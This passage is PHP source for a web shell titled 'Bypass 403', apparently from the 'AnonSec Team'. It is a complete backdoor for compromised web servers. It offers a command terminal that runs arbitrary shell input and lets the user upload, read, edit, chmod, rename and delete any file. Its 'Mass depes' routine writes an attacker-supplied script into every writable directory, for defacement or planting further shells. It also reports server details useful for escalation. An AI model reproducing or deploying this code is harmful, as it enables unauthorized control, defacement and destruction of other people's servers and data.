$i = 's';
} elseif (($p & 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ?
(($p & 0x0800) ? 's' : 'x' ) :
(($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ?
(($p & 0x0400) ? 's' : 'x' ) :
(($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ?
(($p & 0x0200) ? 't' : 'x' ) :
(($p & 0x0200) ? 'T' : '-'));
return $i;
exit();
}
echo "
<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$▛'>
<meta name='robots' content='NOINDEX, NOFOLLOW'>
<title>".$_SERVER['HTTP_HOST']." - $▛ 403</title>
<meta name='viewport' content='width=device-width, initial-scale=0.60, user-scalable=no'>
<link rel='stylesheet' href='//unknownsec1337.github.io/main/style.css' type='text/css'>
</head>
<body>
<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>
<div class='card text-dark'>
<div class='card-header'>
<a href='?'><h4>$▛ Bypass <i class='fas fa-biohazard'></i> 403</h4></a>";
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<i class="fab fa-gitter"></i> : <a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo " [ ".▟($path, p($path))." ]";
echo "
<div class='dropdown'>
<button class='btn btn-dark dropdown-toggle' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='fas fa-server'></i> Menu</button>
<div class='dropdown-menu'>
<a class='dropdown-item' href='?path=$path&dir=$path&id=upload'><i class='fas fa-upload'></i> Upload</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=depes'><i class='fas fa-theater-masks'></i> Mass depes</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=delete'><i class='far fa-trash-alt'></i> Mass delete</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=cmd'><i class='fas fa-terminal'></i> Terminal</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=info'><i class='fas fa-info-circle'></i> Info server</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=about'><i class='fas fa-info'></i> About</a></h5>
</div>
</div>
</div>
</div>";
// tools nya
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
}
elseif($_GET['id'] == 'depes'){
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $▚<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $dirb/$namafile<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />$▘
<form method='post'>
<b>Tipe:</b><br>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>
<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>
<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
<b><i class='far fa-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='far fa-file-alt'></i> File name:</b>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>
<b><i class='far fa-file-alt'></i> Your script:</b>
<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />
<input type='submit' name='start' value='Go' class='btn btn-primary btn-block'>
</form>";
}
}
elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>$disfunc</font>";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>".php_uname()."</font><br />";
echo "<b>Software: </b><font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br />";
echo "<b>PHP version: </b><font color=green>".PHP_VERSION."</font> <b>PHP os:</b> <font color=green>".PHP_OS."</font><br />";
echo "<b>Server Ip: </b><font color=green>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br />";
echo "<b>Your Ip: </b><font color=green>".ip()."</font><br />";
echo "<b>User: </b><font color=green>$user</font> ($uid) | <b>Group:</b> <font color=green>$group</font> ($gid)<br />";
echo "<b>Safe Mode: </b>$sm<br />";
echo "<kbd>Disable Function:</kbd><pre>$disfc</pre>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'about'){
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img class='img-thumbnail rounded mx-auto d-block' src='//unknownsec1337.github.io/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'cmd') {
echo "<br />$▘
<form method='post'>
<div class='input-group mb-3'>
<input type='text' class='form-control' name='cmd' placeholder='ls -la | id | uname -a'>
<div class='input-group-append'>
<input class='btn btn-primary' type='submit' name='id_cmd' value='Go'>
</form>
</div>
</div>";
if($_POST['id_cmd']) {
$cmd = $_POST['cmd'];
echo "
<div class='container'>
<div class='card text-dark'>
<div class='card-header'>
<kbd><b>~$</b> $cmd</kbd><pre>".x($_POST['cmd'])."</pre>
</div>
</div>
</div>
";
}
}
elseif($_GET['id'] == 'upload'){
echo '<br />'.$▘.'
<form method="post" enctype="multipart/form-data">
<div class="input-group mb-3">
<div class="custom-file">
<label class="custom-file-label" for="inputGroupFile04">
<input class="custom-file-input" id="inputGroupFile04" type="file" name="file" onchange="this.form.submit()" multiple>
</label>
</div>
</div>
</form>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
elseif($_GET['id'] == 'delete'){
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($▚)) {
echo "[<font color=green>deleted</font>] $▚<br>";
unlink($▚);
$▟ = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />$▘
<form method='post'>
<b><i class='far fa-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='far fa-file-alt'></i> File name:</b>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>
<div class='input-group-append'>
<input class='btn btn-primary btn-block' type='submit' name='start' value='Go'>
</form>
</div>
</div>";
}
}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "<tr><td><center><br><b>files : </b>";
echo $_GET['filesrc'];
echo '</center></tr></td></table></br>';
echo('<textarea class="form-control" rows="7" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea><br />');
}
elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
//Chmod
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
echo '<form method="POST">
<b>Permission :</b>
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'"/>
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename folder
elseif($_GET['opt'] == 'btw'){
$cwd = getcwd();
echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
<b>New Name :</b>
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="'.$cwd.'">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//rename file
elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<b>New Name :</b>
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="'.$_POST['name'].'" />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
}
//edit file
elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form><br />';
}
echo '</center>';
}else{
echo '</table><br /><center>';
//delete dir
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
//delete file
elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
echo '</center>';
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="container-fluid"><table class="table table-striped table-bordered table-hover bg-white" cellspacing="0" cellpadding="7" width="100%">
<tr>
<th class="text-center bg-dark text-white">Name</th>
<th class="text-center bg-dark text-white">Last edit</th>
<th class="text-center bg-dark text-white">Size</th>
<th class="text-center bg-dark text-white">Permission</th>
<th class="text-center bg-dark text-white">Options</th>
</tr>
</tr>
<tr>';
foreach($scandir as $dir){
$dtime = date("Y-m-d g:i:s", filemtime("$path/$dir"));
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><img class='ico' src='//unknownsec1337.github.io/icon/folder.png'><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>$dtime</center></td>
<td><center>DIR</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="green">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<div class='input-group-append'>
<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</div>
</td>
</tr>";
}
foreach($scandir as $file){
$ftime = date("Y-m-d g:i:s", filemtime("$path/$file"));
if(!is_file($path.'/'.$file)) continue;
$size = filesize($path.'/'.$file)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}
echo '
<tr>
<td><img src="';
$▖ = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if($▖ == "htaccess") {
echo '//unknownsec1337.github.io/icon/htaccess.png';
}elseif($▖ == "png" || $▖ == "jpg" || $▖ == "jpeg" || $▖ == "gif" || $▖ == "ico"){
echo '//unknownsec1337.github.io/icon/images.png';
}elseif($▖ == "php"){
echo '//unknownsec1337.github.io/icon/php.png';
}elseif($▖ == "ini"){
echo '//unknownsec1337.github.io/icon/ini.png';
}elseif($▖ == "html"){
echo '//unknownsec1337.github.io/icon/html.png';
}elseif($▖ == "js"){
echo '//unknownsec1337.github.io/icon/js.png';
}elseif($▖ == "css"){
echo '//unknownsec1337.github.io/icon/css.png';
}elseif($▖ == "json"){
echo '//unknownsec1337.github.io/icon/json.png';
}elseif($▖ == "txt"){
echo '//unknownsec1337.github.io/icon/txt.png';
}elseif($▖ == "sql"){
echo '//unknownsec1337.github.io/icon/sql.png';
}elseif($▖ == "py"){
echo '//unknownsec1337.github.io/icon/py.png';
}elseif($▖ == "pl"){
echo '//unknownsec1337.github.io/icon/pl.png';
}elseif($▖ == "dat"){
echo '//unknownsec1337.github.io/icon/dat.png';
}elseif($▖ == "md"){
echo '//unknownsec1337.github.io/icon/md.png';
}elseif($▖ == "sh"){
echo '//unknownsec1337.github.io/icon/sh.png';
}elseif($▖ == "zip"){
echo '//unknownsec1337.github.io/icon/zip.png';
}elseif($▖ == "rar"){
echo '//unknownsec1337.github.io/icon/rar.png';
}elseif($▖ == "xls"){
echo '//unknownsec1337.github.io/icon/xls.png';
}elseif($▖ == "excel"){
echo '//unknownsec1337.github.io/icon/excel.png';
}elseif($▖ == "word"){
echo '//unknownsec1337.github.io/icon/word.png';
}elseif($▖ == "doc"){
echo '//unknownsec1337.github.io/icon/doc.png';
}elseif($▖ == "mp4"){
echo '//unknownsec1337.github.io/icon/mp4.png';
}elseif($▖ == "mp3"){
echo '//unknownsec1337.github.io/icon/mp3.png';
}elseif($▖ == "pdf"){
echo '//unknownsec1337.github.io/icon/pdf.png';
}elseif($▖ == "csv"){
echo '//unknownsec1337.github.io/icon/csv.png';
}else{
echo '//unknownsec1337.github.io/icon/dflt.png';
}
echo '" class="ico">';
echo "<a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>$ftime</center></td>
<td><center>$size</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="green">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td>
<form method=\"POST\" action=\"?option&path=$path\">
<div class='input-group mb-3 text-center'>
<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">
<option selected disabled>Select</option>
<option value=\"delete\">Delete</option>
<option value=\"edit\">Edit</option>
<option value=\"rename\">Rename</option>
<option value=\"chmod\">Chmod</option>
<option value=\"download\">Download</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<div class='input-group-append'>
<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>
</form>
</div>
</div>
</td>
</tr>";
}
}
echo "
</table>
<div class='card text-dark'>
<div class='card-header text-center'>
<kbd>Copyright © ".date("Y")." - <a href=''>$▛</a></kbd>
<br>".▟_2($path, p($path))."
</div>
</div>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>
<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
</body>
</html>";
?>